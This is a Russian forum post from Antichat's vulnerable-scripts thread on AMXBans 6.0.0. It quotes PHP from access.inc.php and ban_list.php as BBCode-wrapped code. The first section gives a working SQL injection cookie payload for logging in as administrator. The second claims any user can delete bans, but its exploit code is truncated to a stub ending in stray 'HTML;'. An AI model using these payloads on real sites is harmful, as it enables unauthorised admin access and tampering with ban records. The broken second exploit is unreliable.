ANTICHAT - Показать сообщение отдельно - Энциклопедия уязвимых скриптов

AMXBANS 6.0.0

======Вход под администратором:

/include/access.inc.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]cookie[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"loggedin"[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$cook[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]":"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]cookie[/COLOR][COLOR="#007700"]]);

    

[/COLOR][COLOR="#0000BB"]$sid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cook[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

        if(![/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"lang"[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"lang"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$cook[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

    

[/COLOR][COLOR="#0000BB"]$mysql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_connect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_host[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_user[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_pass[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/COLOR][COLOR="#0000BB"]$resource[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_select_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_db[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT id,username,level,email FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_webadmins` WHERE logcode='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' LIMIT 1"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

        if([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {

            while([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uid"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uname"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"email"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]email[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"level"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]level[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"sid"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]session_id[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"loggedin"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];

            }

[/COLOR][/COLOR]

Экспл:

Код:

В куки добавляем: ' or id=1 -- :123

=====Любой юзер может сделать unban

/ban_list.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"del_ban_x"[/COLOR][COLOR="#007700"]]) && isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"bid"[/COLOR][COLOR="#007700"]])) {

[/COLOR][COLOR="#FF8000"]//get all uploaded files for the ban and delete it

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT `id`,`demo_file` FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_files` WHERE `bid`="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$bid[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

    while([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {

        if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"include/files/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]demo_file[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#FF8000"]//delete the file(s)

[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"include/files/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]demo_file[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_thumb"[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]unlink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"include/files/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]demo_file[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_thumb"[/COLOR][COLOR="#007700"]);

            }

            if([/COLOR][COLOR="#0000BB"]unlink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"include/files/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]demo_file[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#FF8000"]//if file deleted, remove db entry

[/COLOR][COLOR="#0000BB"]$query2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DELETE FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_files` WHERE `id`="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" LIMIT 1"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

            }

        }

    }

[/COLOR][COLOR="#FF8000"]//delete all comments for the ban

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DELETE FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_comments` WHERE `bid`="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$bid[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/COLOR][COLOR="#FF8000"]//get ban details

[/COLOR][COLOR="#0000BB"]$ban_row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql_get_ban_details[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$bid[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]//delete the ban

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DELETE FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans` WHERE `bid`="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$bid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" LIMIT 1"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/COLOR][COLOR="#0000BB"]log_to_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Ban edit"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"Deleted ban: ID "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$bid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" ( )"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]//redirect to start page

[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]) {[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location:index.php"[/COLOR][COLOR="#007700"]); exit; }

}

[/COLOR][/COLOR]

Экспл:

Код:

$id = "id user";
$pat = "http://site.ru";
echo 

HTML;